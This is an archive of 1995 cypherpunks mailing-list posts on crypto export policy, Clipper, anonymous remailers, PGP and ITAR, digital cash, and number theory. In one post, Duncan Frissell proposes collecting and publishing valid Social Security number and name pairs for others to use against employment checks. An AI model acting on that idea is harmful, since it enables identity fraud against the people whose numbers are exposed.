                               and http://www.clark.net/pub/jcblal/jcbcos.html

Freedom Magazine Vol 27, Issue 4, published by the CoS RTC, has some articles
online dealing with copyright, anonymity, privacy, and cryptography. As I've 
said before, I'm scared of getting slapped with a frivolous lawsuit by some 
arm of the CoS, so I won't quote anything from the articles. Perhaps some of
the other vocal people on the list who think CoS wouldn't hurt a fly will
distribute some choice Fair Use quotes.

http://www.theta.com/goodman/hijack.htm argues for pre-emption of new govt.
regulation of anonymity on the net by application of existing law, although
it fails to recognize some of the protections for anonymity in said law. It
also quotes some criticism by Bruce Koball of the 40-bit export restriction
on RC4, and Clipper. The article editorializes against govt. suppression of
strong crypto.

http://www.theta.com/goodman/lies.htm is entitled "Solutions to On-Line Lies",
and advocates forcing remailer operators to know the identities of their
users/customers, and holding them liable for the content of remailed messages.
It generally urges intolerance of unpopular online speech, and remarkably
laments Microsoft's inability to sue for defamation over the Microsoft-to-buy-
Catholic-Church spoof.

http://www.theta.com/goodman/crime.htm offers some case histories of 
net.criminals (according to them), including Kevin Mitnick, some guys accused
of rape (stuck under the moniker of `child pornographers'), and Dennis 
Ehrlich, subject of a CoS-inspired February raid by the copyright police. The
juxtaposition of these figures is strikingly absurd.  

There's more, but this should give you a taste for what's there.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 14 Aug 95 06:29:58 PDT
To: cypherpunks@toad.com
Subject: Data Secrecy Rift
Message-ID: <199508141329.JAA02054@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


This seems worth posting in full:

----------

   The New York Times, August 14, 1995, pp. D1, D8.


   Rift Emerges Over Computer Data Secrecy Issue

   By John Markoff


   Some of biggest names in the computer industry sent
   separate letters to the White House last week in
   pre-emptive moves aimed at a proposed regulation originally
   intended to insure that law-enforcement officials have
   access to encoded telephone and computer communications.
   The proposal may be released as soon as this week.

   But as the Government's task force on the encryption issue
   prepared to disclose the closely held details of the
   proposal -- the latest version of a measure revealed more
   than three years ago but subsequently reconsidered in the
   face of industry opposition -- unexpected divisions emerged
   from the last-minute, scattershot lobbying.

   The splits are developing at a crucial moment, with the
   Government's interagency task force also apparently divided
   between those favoring maximum governmental access to
   communications and those who support a loosening of export
   restrictions. Most industry executives had hoped to present
   a united front in favor of the more liberal position -- a
   goal that now appears to be in jeopardy.

   The two major groups sending letters to Vice President Al
   Gore, the Administration's point man on technology issues,
   were a group of computer hardware manufacturers and a group
   of the largest makers of software.

   In a letter sent to the Vice President last Thursday, eight
   executives, including James Treybig, chairman of Tandem
   Computers Inc.; Gil F. Amelio, chairman of the National
   Semiconductor Corporation; Edward McCracken, chairman of
   Silicon Graphics Inc.; Eugene Shanks Jr. president of the
   Bankers Trust New York Corporation, which conducts
   international electronic commerce, and Stephen T. Walker,
   chairman of Trusted Information Systems, urged that the
   Government immediately establish a new standard to control
   the export of technology that is used to encode
   communications, so that outsiders cannot tap in.

   A day later, however, a group of software publishers,
   including William H. Gates, chairman of the Microsoft
   Corporation; Jim P. Manzi, president of the Lotus
   Development Corporation and a senior vice president of
   I.B.M., Robert Frankenberg, chairman of Novell Inc.; Mark
   B. Hoffman, chairman of Sybase Inc., and Carol Bartz,
   chairwoman of Autodesk Inc., wrote arguing that the
   possible restrictive regulations that may soon be offered
   by the Government would fail to remove the current
   obstacles that keep American companies from competing in
   lucrative international markets.

   Many off-the-shelf programs cannot be marketed abroad
   without alteration under current regulations. For example,
   before American publishers can sell the popular Lotus Notes
   program abroad, they must replace its encoding system with
   a weakened version so that foreign communications can be
   monitored by American intelligence agencies. These
   restrictions date to the 1970's when advanced computer
   technology was treated as the equivalent of military
   technology and subject to the same strict controls.

   The software publishers have been able to sell their highly
   effective communications encoding products in this country,
   while sales abroad, they contend, have been hurt. Their
   letter also said that although the Administration agreed
   last year to work with industry toward a compromise, "there
   has been only minimal consultation with the software
   industry with respect to basic questions."

   "We're worried the Government is about to announce the son
   of Clipper," said Robert W. Holleyman 2d, president of the
   Business Software Alliance, referring to the Government's
   original proposal for changing the standard. This proposal,
   released in April 1993, would have replaced the cold
   war-era restrictions with a coding standard that allowed
   sales of strong encryption programs, but would have given
   United States law-enforcement agencies access to all
   communications through a back door with a numerical key.

   "The Administration has been trying to resolve how to keep
   U.S. companies competitive, but there remain individuals in
   the Government who want to do anything they can to slow the
   proliferation of new encryption technologies," Mr.
   Holleyman said.

   In April 1992, the Administration proposed a hardware-based
   system for protecting the privacy of telephone calls and
   computer data transmissions. The standard, known as the
   Clipper Chip, included a special "backdoor" that would
   permit law-enforcement officials to listen to conversations
   and monitor data exchanges.

   The original Clipper system called for a two-part key for
   decoding scrambled conversations. The two parts of the key
   -- actually two large numbers -- were to be held by two
   independent Government agencies. Under the plan, when a
   law-enforcement agency had a warrant to listen to a
   conversation encoded by Clipper, it would obtain the keys
   from the separate agencies. By merging the keys, it could
   obtain a key that would unlock the coded conversation.
             
   The Clipper proposal met with angry opposition both from
   advocates for civil liberties, who argued it would
   undermine the right to privacy, and by high-technology
   executives who said Clipper would be unacceptable for
   foreign users who would not want their conversations to be
   readable by the United States Government.

   The announcement of the new proposal may be imminent. Two
   trade associations, the Software Publishers Association and
   the American Electronic Association, are planning a
   conference on cryptography policy for Friday.

   Several people familiar with Administration policy
   discussions said the Government had until recently remained
   divided and that the director of the Federal Bureau of
   Investigation, Louis J. Freeh, has been the most vocal
   advocate of placing strict limits on any use of
   unsanctioned encryption technology.

   After the bombing of the Federal building in Oklahoma City,
   the F.B.I., circulated a proposed antiterrorism bill on
   Capitol Hill that would have banned even the domestic use
   of coding software except for systems approved by the
   Government.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 14 Aug 95 06:47:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Data Secrecy Rift
In-Reply-To: <199508141329.JAA02054@pipe4.nyc.pipeline.com>
Message-ID: <9508141346.AA22758@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff writes:
>    In a letter sent to the Vice President last Thursday, eight
>    executives, including James Treybig, chairman of Tandem
>    Computers Inc.; Gil F. Amelio, chairman of the National
>    Semiconductor Corporation; Edward McCracken, chairman of
>    Silicon Graphics Inc.; Eugene Shanks Jr. president of the
>    Bankers Trust New York Corporation, which conducts
>    international electronic commerce, and Stephen T. Walker,
>    chairman of Trusted Information Systems, urged that the
>    Government immediately establish a new standard to control
>    the export of technology that is used to encode
>    communications, so that outsiders cannot tap in.

This doesn't say very much. What sort of "new standard" for crypto export
control did they urge ?  Also, if you'll pardon my naivete, how does TIS
stand to benefit from such restrictions ?

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: theilman@umsmed.edu (Gary Theilman)
Date: Mon, 14 Aug 95 08:42:11 PDT
To: cypherpunks@toad.com
Subject: Re: My pseudo-anonymous dream list
Message-ID: <9508141541.AA03333@fiona.umsmed.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>There are, however, a great number of internal improvements that could be 
>made that would both improve user-end usefulness AND improve overall 
>security.

I use Private Idaho, Eudora, and an account on alpha.c2.org.   Let's see how
the wishlist
compares with this setup.

>1)  Multiple Remailers:
>I'd like to see multiple (maybe >12) remailers that utilize the same
>database, upgraded by batched processes once or twice a day or "broadcast"
>realtime to all the reamilers in the web (probably the latter is better). 

Probably could be done by sharing the alpha.c2.org database to other remailers.
I don't see any security problems with this as long as people use encrypted
remailing
blocks.


>2)  Encrypted Databases:
>Any properly designed 'nym' server should have a totally 
>encrypted database.

alpha.c2.org doesn't require this, but a smart user will arrange to have
their reply block encrypted with the key of several different remailers.

>3)  Limited ID lifetime
>Another failing, IMHO, with penet.fi is that ID#'s have an unlimited 
>lifetime.

Is this really a problem?  Makes sense from a housekeeping point of view,
though.

>4)  Chained Mailings
>Because you have many remailers operating, all messages should be randomly
>chained through them. 

You can set up your reply block for chaining, although it isn't random.

>Before a chaining is done, the remailer should ping the target remailer to
>make sure it is up, so that mail isn't sitting in the queue.  

Hmmm.   May be a problem if you are using latent time.

>All chained mail should also be encrypted.

alpha.c2.org can do this

 
>5)  Encryption/Signature Validation
>Any message that is emailed PGP signed should be validated by the remailer
>(with the User having to email in their public key as part of the
>registration process, if they so choose, or remailers can use the
>keyserver). 

Does this present a security problem, perhaps in conflict with suggestions #2?


>6)  Two-way

I can do this now, although sometimes the reply is delayed a few days.


>7)  Option Validation
>In order to change any of the options on your ID (ie, the expiration date
>of your ID, or to expire it immediately, or to set the number of "hops" 
>you want to chain through), you should have to submit a PGP Signed command
>message.  Then, similar to a LISTSERV that confirms subscriptions and
>unsubscriptions, a message is sent back asking you to "ok" these changes. 
>This return message is sent as PGP encrypted email to your public key. 
>When you decode it, you are given a, say, 10digit code string that you need
>to mail back to confirm the changes. If you don't, it doesn't.  

A password is required for alpha.c2.org to make changes.  And any message 
containing command changes must be encrypted with the remailer's key.


>8)  Robust Web of Remailers
>Remailers come and go daily.  Any pseudo-anonymous remailer web needs to
>be able to handle that fact.  Thus, a mechanism needs to be put into place
>to allow for easy adding of a new machine (if it's easy, more people will
>do it) with minimal maintanence.  In addition, if a remailer disappears
>(say, because somebody caught wind of it and ordered the student to turn
>it off :-), the rest of the remailer web needs to be able to survive.  Of
>course, that particular address will be dead, but with apprpriate FAQs
>posted around, people should be able to quickly find another address that
>uses the same database. 

I regularly check the pinging service at remailer-list@kiwi.cs.berkeley.edu
to do this.


>
>9)  Proper PR

Agreed.


GREAT SUGGESTIONS!    I think that alpha.c2.org comes closest to fulfilling
your wish list,
although it has several problems.   The greatest problem is ease of set up.
It took me several
tries before I figured out how to set up and send an encrypted reply block
in such a way
that it could not be traced back to me.  It also suffers from tremendous
overload, much like
anon.penet.fi.  As a result, it can be slow.

I would add a few more suggestions of my own to your wishlist.

11)  Seamless integration with existing mail programs, such as Eudora.

12)  Notification that your message has been received (I'm not sure how to
do this and maintain
anonymity)

13)  Ability to handle very large encrypted files (binaries).

14)  Perhaps increasing security by breaking messages into several parts,
routing them through
different chains, and reassembling them just prior to transmission to recipient.


Keep up the good work!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMC+JEFQVGHmq7kxdAQEWOQQAvKO3kZp6uMoYdRgEohWFk8PpPdw27iSB
si2hFqZOm72581sEo2OXCmCSM9pn193XSOSqZJ1yYALi1OfQ2UrzuNbpteyE2rP8
koz72XU7OIs+8eLJ4+lp02gCq4/0no/simB9fWO+cAIp5zWB30jaHdp2lca37Z8Y
7vuiMuT3Pxc=
=4X+7
-----END PGP SIGNATURE-----
Gary D. Theilman, Pharm.D.
University of Mississippi School of Pharmacy
Department of Clinical Pharmacy Practice

Finger for PGP Public Key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 14 Aug 95 08:16:34 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Protect the children" as passphrase to Constitution
Message-ID: <199508141515.LAA00956@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:35 PM 8/10/95 -0700, Timothy C. May wrote:

>Now clearly this strategy will be welcomed by many. It's hard to argue
>against children and against the "protection of children." Arguing the
>Constitutional side is tough when "the children" are at issue. 

I don't know, I find it pretty easy.  All you have to do is say "The
Slickster thinks that kids should be able to get government condoms and
government abortions at will and should be able to copulate with abandon --
so what's a few cigarettes?"  I thought Heillary said that children had a
right to sue their parents?  If the children's rights movement wants all of
the above, it has to allow them to smoke and avoid vaccinations as well.  If
it's wrong to interfere with kids' autonomy in sex and litigation, than it's
wrong to interfere with their autonomy in guns and smokes.

I always say that I want to reduce State power "for the children."  Putting
a really commie-liberal accent on the phrase.  It bugs the opposition.  It's
a null argument since you can argue in favor of anything "for the children."

During the '92 campaign, Clinton said "I wake up every morning and worry
about your children."  I said in one of my .sigs, "Please don't worry about
my children because if you do you might feel compelled to do something about
them and the ensuing fire fight could cause substantial collateral damage in
the neighborhood."

>The potential crypto relevance? Look for arguments about limiting access to
>strong crypto to be more heavily focussed on "pedophiles" and
>"pornographers." Look for calls to have a national I.D. card--which serves
>many State-needed purposes (and I don't mean in terms of Revelations). A
>national I.D. card could then be tied in to GAK/escrow systems.

The current national ID push is for illegal immigration control purposes.
The last national ID push was under the Health Security Act.  They are
certainly anxious to get internal passports, aren't they.  Luckily, as long
as other nations within our passport control zone (like Canada and Mexico)
don't have national ID cards, they will be easy enough to dodge for non work
purposes.

The Jordan Commission recommendations (calling for SS#/True Name matches as
a condition for employment) can be defeated by a direct action program of
publishing valid SS#/True Name matches.  If you get enough valid pairs out
in the public domain (still legal to do), illegal aliens and citizens who
prefer not to participate in the system can use them.  That would corrupt
the control system.

I need practice with HTML forms and databases.  Perhaps that would be a good
project.  Writing a simple form to collect and store SS#/Name submissions
from the general public.

DCF

"Government is not healthy for children and other living things."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 14 Aug 95 03:49:09 PDT
To: cypherpunks@toad.com
Subject: Australia crypto ill news: pointers
Message-ID: <20465.9508141048@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



The following URL was posted by Ross Anderson (the author of the
article quoted in RISKS):

http://commerce.anu.edu.au/comm/staff/RogerC/Info_Infrastructure/Orlowski.html

This is a pointer for the full text of the Orlowski paper (the cause
of much discussion on the future of crypto in Australia).

Also Roger Clark's home page contains lots of interesting references
for crypto policy, privacy, some info on CFP, etc, very interesting
reading I found:

	http://commerce.anu.edu.au/comm/staff/RogerC/RogersHome.html

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 14 Aug 95 04:12:27 PDT
To: cypherpunks@toad.com
Subject: votelink - some discussions on Phil Z & ITAR
Message-ID: <20548.9508141111@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



A short time ago on cpunks someone posted this pointer:

	http://www.votelink.com/

as there was a vote and associated discussion forum being offered on
the subject of Phil Z, the (somewhat leading - incorrectly leading)
question:

 "Should Phil Zimmermann be prosecuted for allowing release of his PGP
  encryption program on the Internet?"

(The comment on leading question being prompted of course by the fact
that Phil did not himself export PGP, nor put it on the internet, nor
even put it on US BBSes.  The way I understand the story was that a
friend of Phil's posted the code to US BBSes, and that an unknown 3rd
party posted it from there to the Internet.  He is being investigated
for "making PGP available in a form in which it could be exported",
something different to what is implied by the question.  In this light
I find it difficult to understand how he could be held to have
"allowed it's release on the Internet", something which even the State
Department investigation is not I think accusing him of.  Several
people pointed this out in the discussion forum.  A more accurate
phrasing would perhaps have been:

 "Should Phil Zimmermann be persecuted for writing PGP?"

but then that is no doubt biased in the opposite direction.)

An interesting vote in any case, and the balance so far is:

YES: 000,172 | ABSTAIN: 000,096 | NO: 001,508

The abstainers I think could be partly explained by the worry that the
question was leading or incorrect, as this opinion was voiced in the
discussion forum.

Also an interesting thread was generated in the (WWW hosted)
discussion forum about the legal problems implied by me posting these
two snippetts of code (which I posted to the forum earlier):


#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)


------------------ PGP.ZIP Part [024/713] ------------------- 
M!4HD";*K"$$=/!<29+_A`K9C/2+@"4<,5G(N0M`47K#'`T6"[&>M83PL=@FR
8ES%:6Q"(F9A#)K!&_;X4TXZ?(T]6(]`>$*.^]3K*K["(239)\@F
MHA\"<%"5(%N->/2!'>X3XPU<0!Y,F``58RK(F;K#XD2,^`F[L09CT1>MH,7/ 
------------------------------------------------------------- 


(hmm it seems that their WWW conversion chopped out some parts of it
presumably due to it containing < and > symbols, so perhaps their
fears were even further unfounded).  

They were alarmed by the implication that their WWW server now
contained PGP code which they did not feel qualified to judge the
implications, or correctness of.  This prompted the posting to the
forum of a rather worried sounding disclaimer by a votelink
representative, to the effect that they were abiding by the Prodigy
ruling, and so felt unable to remove the offending piece of ITAR
breakage, and yet felt rather unconfortable with it's presence.

I hastened to explain (after a certain cpunk kindly drew by attention
to the discussion which I had neglected to check out after posting the
1st message) that the same dilema applies to numerous other forums,
such as USENET news distribution sites, sci.crypt archives, cpunks
archives, etc, etc.

Generated some interesting discussion anyway.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 14 Aug 95 09:15:38 PDT
To: cypherpunks@toad.com
Subject: COS_sak
Message-ID: <199508141615.MAA29588@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-14-95. NYPaper [a mote for Futplex's panoptic biblio]:


   "Dissidents Use Computer Network to Rile Scientology."

      The Church of Scientology is battling a band of on-line
      dissidents who have used the Internet to mail out
      globally its secret scriptures. On Saturday, as a result
      of a copyright infringement lawsuit, US marshals seized
      the computer of a former church employee who had
      electronically posted a 13-page text that he said was
      available in court records.

      Helena K. Kobrin, a lawyer for the church, said: "There
      are people out there who somehow think the Internet has
      created a new medium where all the rules go away, and
      it's not true. Things happen faster on the Internet, and
      we're going to keep up."


   COS_sak (about 7K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 14 Aug 95 09:17:10 PDT
To: cypherpunks@toad.com
Subject: CEL_tic
Message-ID: <199508141617.MAA29734@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-14-95. NYPaper:


   "Israelis and Others Feel the Sting of a Cellur Phone Bug."

      A software bug inside the Alpha digital phone of
      Motorola has demonstrated an area of vulnerability in
      the growing web of digital communications systems -- and
      prompted Motorola to issue a worldwide recall. Motorola
      wound up asking 150,000 Alpha users in six countries to
      return the phones to have the software changed. The
      Alpha adheres to an emerging standard for digital
      cellular telephones called time division multiple
      access, or T.D.M.A. The bug caused the phone to lock on
      to one channel and stay there indefinitely.

      "There are tremendous risks as soon as you put something
      in software," said Peter Neumann, a computer security
      specialist with SRI International. The cellular industry
      "has foisted a disastrously insecure technology on the
      public," he said.


   CEL_tic (about 7K)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Mon, 14 Aug 95 12:24:33 PDT
To: cypherpunks
Subject: Are we forming the "social sector"?  FYIntrospection...
Message-ID: <9508141924.AA00272@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded-by: sbb@well.com (Stewart Brand)
To: telecom_ir@rand.org
cc: Frank Fukuyama <fukuyama@rand.org>
Subject: Re: Cyberspace Security and the Internet Metaphor
Date: Sun, 13 Aug 95 12:12:46 PDT
From: David Ronfeldt <ronfeldt@rand.org>

The discussion has assumed a familiar ring, as though the responsibilities
for and answers to cyberspace security lie in the usual two realms or
sectors: government or market, public or private.

Is that the only range of choice?  It pretty much has been for decades.
But I still say there is a new realm/sector emerging out there now, which,
for lack of a more acceptable term, amounts to what Drucker terms the
social sector.

        "the post-capitalist polity needs a 'third sector,' in addition
        to the two generally recognized ones, the 'private sector' of
        business and the 'public sector' of government.  It needs an
        autonomous social sector." (Drucker 1993)

Many Internet-related NGOs (like EFF) and individuals (like Zimmerman)
fall in this sector.  They aren't government or market; they are nonstate,
nonprofit actors.  And besides just having a lot to say about cyberspace
security issues, they have some roles to play--e.g., distribution of
encryption techniques, watchdog and warning activities.  For now, these
roles are minor.  But my guess is that they will get increasingly bigger,
probably in ways we do not yet foresee.

Whether their roles will soon be as significant as those of government and
market actors is less important than whether they are, and increasingly
will be, contributing something significant to the overall design mix.  My
presumption is that advanced societies develop mixes that distribute "the
solution" across various realms and their actors.

What I would like to know and discuss--and I ask you all--is what these
nonstate, nonprofit actors are doing at present that amounts to their
being part of the solution(s)?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Mon, 14 Aug 95 03:41:24 PDT
To: cypherpunks@toad.com
Subject: Changes in Operation..
Message-ID: <199508141041.MAA10228@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


	ATTENTION: The anonymous remailer operators at vishnu.alias.net
and spook,alias.net have decided to activate the reordering option on both
the Type-I (original cypherpunk) and Type-II (MixMaster). This means that
there will be at least 5 messages in the outbound queue and they will be
delivered randomly. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 14 Aug 95 12:14:20 PDT
To: 74774.3663@compuserve.com
Subject: Re: An article for Wired magazine
In-Reply-To: <950814181048_74774.3663_EHL147-1@CompuServe.COM>
Message-ID: <199508141914.NAA16529@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text




-----BEGIN PGP SIGNED MESSAGE-----

> First of all, digital money can take various forms.  Existence on a hard 
> drive is one of those forms.  But, it is also possible to have digital money 
> on a card-based platform. Mondex in the UK currently has official government 
> units of account digitally represented for their Mondex card trial in 
> Swindon.  They have also announced that in the future this card will hold up 
> to five "official" currencies.  Furthermore, they make no secret about the 
> fact that this digital money is ideally suited to transfer on the Net.  Visa 
> and Mastercard are both working on stored-value cards which will also 
> digitize official currencies.  CyberCash has also announced plans for an 
> electronic token which will most likely represent an official currency.  
> Others will announce soon.


I'd like to go on record as stating that all of these other systems pretty
much suck.  Mondex, for example, actually stores non-crypto messages of the
type "Hi there I represent one hundred Belgian crowns" in its cards, so if
you can hack the "front-door" security (possibly with physical hacking of the
card) and convince a Mondex card that your PC is another Mondex card you can
transfer infinite money to it.  (Well, I suppose you wouldn't be able to
transfer more than 2^64 units of currency or some such limit, but you get the
idea.)


Contrast this with DigiCash's scheme in which each cyberbuck is
cryptographically unforgeable.


Most of the other companies have similarly weak security.  Many of them are
not offering any new technology at all, but are simply offering to transport
your credit card number for you, encrypted, over the net.


Furthermore none of DigiCash's competitors, as far as I have been able to
learn, offer any kind of anonymity the way DigiCash does.  The closest they
come is "confidentiality".  Yeah-- right.  I can get the same offer from the
Ministry of Truth.


Finally, be aware that e-cash can be put onto a smart card just as well as
on a magentic disk.  DigiCash is actually in the process of developing and/or 
marketing smart cards that hold such things as toll token for toll roads and
civic credits for coffee houses in Europe.  See their home page for more
detailed (and probably more accurate) info.


Source of facts behind these opinions:  Perusing the web pages of the
principals.


 DigiCash home page http://www.digicash.com/
 FIRST VIRTUAL Holdings Incorporated http://www.fv.com/
 Mondex Home Page http://www.mondex.com/mondex/home.htm
 CyberCash, Inc. Home Page http://www.cybercash.com/
 CommerceNet Home http://www.commerce.net/
 RSA Data Security, Inc.'s Home Page http://www.rsa.com/
 Net1 Home Page http://www.netchex.com/
 Electronic Commerce http://www.zurich.ibm.ch/Technology/Security/extern/ecommerce/
 The NetCheque(SM) system http://nii-server.isi.edu:80/info/NetCheque/
 NetMarket Homepage http://netmarket.com/nm/pages/home
 Downtown Anywhere - Front Street http://www.awa.com/
 Internet Shopping Network http://www.internet.net/
 Cash, Tokens, etc on NII http://www.cnri.reston.va.us:3000/XIWT/documents/dig_cash_doc/ToC.html
 NetBill Project Home Page http://www.ini.cmu.edu/netbill/
 NetMarket Homepage http://netmarket.com/nm/pages/home
 NexusBucks http://www.c2.org/nexbucks/
 Economics and the Internet http://gopher.econ.lsa.umich.edu/EconInternet.html
 Security First Network Bank, FSB http://www.sfnb.com/
 Commerce on the Internet http://home.netscape.com/newsref/std/credit.html
 A History of Money http://www.ex.ac.uk/~RDavies/arian/llyfr.html
 Wenbo Mao's Presentation http://www.hpl.hp.co.uk/projects/vishnu/main.html
 Internet Casinos http://www.casino.org/" ADD_DATE="801367759
 The E-cash Market http://www.c2.org/~mark/ecash/ecash.html

  

> Stand-by though:  governments and central banks will do everything in their
> power to discourage and prevent this for the power to issue and coin money is
> one of THE most cherished privileges of the Crown !


...and it seems like the first step that they are taking is sanctioning 
inferior, less secure, privacy-decreasing technologies over DigiCash's superior
alternative.


And so it goes...


Bryce
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMC+gSPWZSllhfG25AQHe+gQAhiPQ8GN+cg4Q6lLe6c8UQovOVN301lop
tAthnw7qbLDY/dKItCy9AzImDGn2WFTwx3i+nouWbDSWwGUw0Zlc6ajdRlCviX9a
BihtvGJaaujxv13ERI6jjmmfkvbctDfqUrDvrgjQB/0kOhSxt5VTkA2tNdzGiEK9
4EA3f+0Cah0=
=cJy2
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Mon, 14 Aug 95 13:24:49 PDT
To: "cypherpunks@toad.com>
Subject: Get 1/3 net of 900-CAN-MY0B
Message-ID: <199508142024.NAA27382@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

Buy ads for The Agorist Institute's new privacy information
audiotext distribution line (aka 900-number), and get 1/3
of the income above strictly defined costs for TeleConnect
and MCI.

After computing the service bureau and MCI take, it looks 
like we'll have to charge 1.95 (or 1.99 more likely) per 
minute if more than half of the money is to be available for
a three way split. Right now I'm reading a script on a 
low audio volume tape player at 99 cents per minute.

The three ways are 1/3 to Lon Weber, freedom4@aol.com, 
the owner of the 900#, 1/3 to J. Kent Hastings, 
zeus@pinsight.com, Assistant Director of The Agorist Institute, 
the "sponsor" of the line, and 1/3 to an advertiser.

If more than one advertiser gets involved, we can assign and pay
for calls in defined territories. If you buy ads in Colorado, you'd 
get 1/3 of the net from Colorado calls. 

Or if just a few participate with nationwide print, radio, or video
infomercials, we can assign extension numbers, which are 
automatically tallied by TeleConnect, to identify who is to be paid.

Of course, one single investor willing to finance a complete ad 
campaign could use these techniques to select the most 
profitable approaches.

We have the line, 1-900-CAN-MY0B, and it is already approved.
The "MIND YOUR 0WN BUSINESS" audiotext program. 
1 - 9 0 0 - C A N - M Y 0 B  (1-900-226-6902)
      Note the zero digit, not the letter "O."

   "The Feds say you can't have privacy, but we say you 
      CAN 'Mind Your 0wn Business!'"

Help get it going, so we can make a dollar and provide useful
privacy news and techniques to the public. A 900# doesn't have 
the printing and postage costs of a newsletter, and the listener
doesn't need to use a credit card or write a check for a 
subscription.

I'm also willing to give 1/2 of my 1/3 (=1/6) for monthly professional 
audio production.

Send e-mail to me at zeus@pinsight.com for more information.

Kent
--
J. Kent Hastings, Assistant Director of The Agorist Institute
zeus@pinsight.com -- http://www.pinsight.com/~zeus/agorist/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 14 Aug 95 05:23:19 PDT
To: samman@cs.yale.edu
Subject: Re: Q's on Number Theory/Quadriatic Residues
Message-ID: <9508141212.AA01243@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> >Bzzt!  Try Again.  If you use bc, you will notice that 9^2 mod 35 == 11
> >and 8^2 mod 35 == 29...  You should go take your number theory class!
> 
> Definitely. Is there an easy way to get from the 29 to the 8?  I can see how
> it goes
> the other way, but what I didnt' see was how, if given 29, I could get the
> 8? (Euclid's?)


You can get the square root mod p (p prime) easily, if p+1 is divisible by 4.


You (should) know that  x ^ (p-1) equals to 1 mod p for every given x > 0.

Therefore  x ^ ( (p-1)/2 ) is either +1 or -1  mod p.


Now you have a given  x^2 and want to find x (one of both, there are two..)

 
 ( x^2 ) ^ ((p+1)/4)  =   x ^ (  (p+1)/2 )  =  x * x ^( (p-1)/2 ) = +/- x .

If p+1 is not divisible by 4, it's a little bit more difficult...




In your example, 35+1 is luckily divisible by 4.  But this doesn't help,
because 35 is not a prime.  35 = 5*7 , you can use the chinese remainder and
find the root mod 5 and the root mod 7. 7+1 is divisible by 4, you can use the trick:

( 8 ^ 2 ) ^ 2 mod 7 =  +/- 1.   (which is correct since 8 = 1 mod 7);

     +1 and -1 are the roots of (8^2) modulo 7.




Modulo 5 we can't use the trick, but we guess the roots of (8^2) = 4 mod 5 as
  2 and 3.




Back to the main problem: You want to have the root of (8^2) mod 35. 

We found the roots  1 and 6 as roots of  (8^2) mod 7
and      the roots  2 and 3 as roots of  (8^2) mod 5.



Now solve the Chinese remainder for each possible pair (1,2), (1,3), (6,2), (6,3),
and you get the _four_ roots of (8^2) mod 35. Two of them will be 8 and -8, and there
are another two.

BTW: This is one way to do a mental coin flipping.  

 


Hadmut :-)




